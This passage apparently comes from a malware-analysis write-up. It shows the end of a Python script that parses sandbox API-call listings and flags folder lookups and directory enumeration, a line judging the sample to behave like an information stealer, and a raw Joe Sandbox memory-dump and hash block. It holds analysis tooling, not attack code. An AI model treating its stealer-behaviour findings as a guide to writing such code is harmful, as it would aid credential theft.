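• Part of subcall function 004F4B60: FindClose.KERNEL32(000000FF), ref: 004F4DE2
"""

# One bullet per call; the argument list is optional (wsprintfA has none in the report).
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Well-known CSIDL folder ids from Shlobj.h; bits above 0xFF are flags (e.g. CSIDL_FLAG_CREATE).
CSIDL_NAMES = {
    0x00: "CSIDL_DESKTOP",
    0x05: "CSIDL_PERSONAL",
    0x10: "CSIDL_DESKTOPDIRECTORY",
    0x1A: "CSIDL_APPDATA",
    0x1C: "CSIDL_LOCAL_APPDATA",
    0x23: "CSIDL_COMMON_APPDATA",
    0x26: "CSIDL_PROGRAM_FILES",
    0x28: "CSIDL_PROFILE",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report shows "?" (value not recovered)
    ref: int                    # address of the call instruction
    subcall: Optional[int]      # callee the call belongs to, None for a direct call


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines into ApiCall records; non-call lines are skipped."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            for tok in m.group("args").split(","):
                tok = tok.strip()
                args.append(None if tok == "?" else int(tok, 16))
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def csidl_name(value: int) -> str:
    return CSIDL_NAMES.get(value & 0xFF, f"CSIDL_0x{value & 0xFF:02x}")


def summarise(calls: List[ApiCall]) -> Dict[str, object]:
    """Reduce the call sequence to the behaviours an analyst looks for."""
    names = [c.api for c in calls]
    folder = None
    for c in calls:
        # SHGetFolderPath(hwnd, csidl, hToken, dwFlags, pszPath): csidl is the 2nd argument.
        if c.api.startswith("SHGetFolderPath") and len(c.args) > 1 and c.args[1] is not None:
            folder = csidl_name(c.args[1])
    enum_subs = {c.subcall for c in calls if c.api.startswith("FindFirstFile")}
    # String compares inside the enumeration subcall: consistent with a "."/".." filter (assumption).
    compares = sum(1 for c in calls if c.api.startswith("StrCmp") and c.subcall in enum_subs)
    return {
        "special_folder": folder,
        "concat_calls": names.count("lstrcat"),
        "directory_enumeration": all(n in names for n in ("FindFirstFileA", "FindNextFileA", "FindClose")),
        "name_compares_in_enum_loop": compares,
        "subcalls": sorted(f"{s:08X}" for s in {c.subcall for c in calls if c.subcall is not None}),
    }


if __name__ == "__main__":
    for key, value in summarise(parse_api_lines(REPORT_LINES)).items():
        print(f"{key}: {value}")
```

Run on the listing above it reports CSIDL_LOCAL_APPDATA as the root, four lstrcat calls building the path, and a complete FindFirstFileA/FindNextFileA/FindClose loop in subcall 004F4B60, which is what you would expect from a stealer walking a per-user application-data directory.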
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 5f073e321dda448b2550e0a2395f7bd0204e484bee4adbf5afd314a5b4fa02ef
                                        • Instruction ID: 2e16a00f86d62abe8de37b1e0e345b3f26d15fe3f831329ade5473fe0031f608
                                        • Opcode Fuzzy Hash: 5f073e321dda448b2550e0a2395f7bd0204e484bee4adbf5afd314a5b4fa02ef
                                        • Instruction Fuzzy Hash: B321B8B6900208ABCB14E761EC56FFD333CAB94300F00865DB75556191EE7CAAC8CB99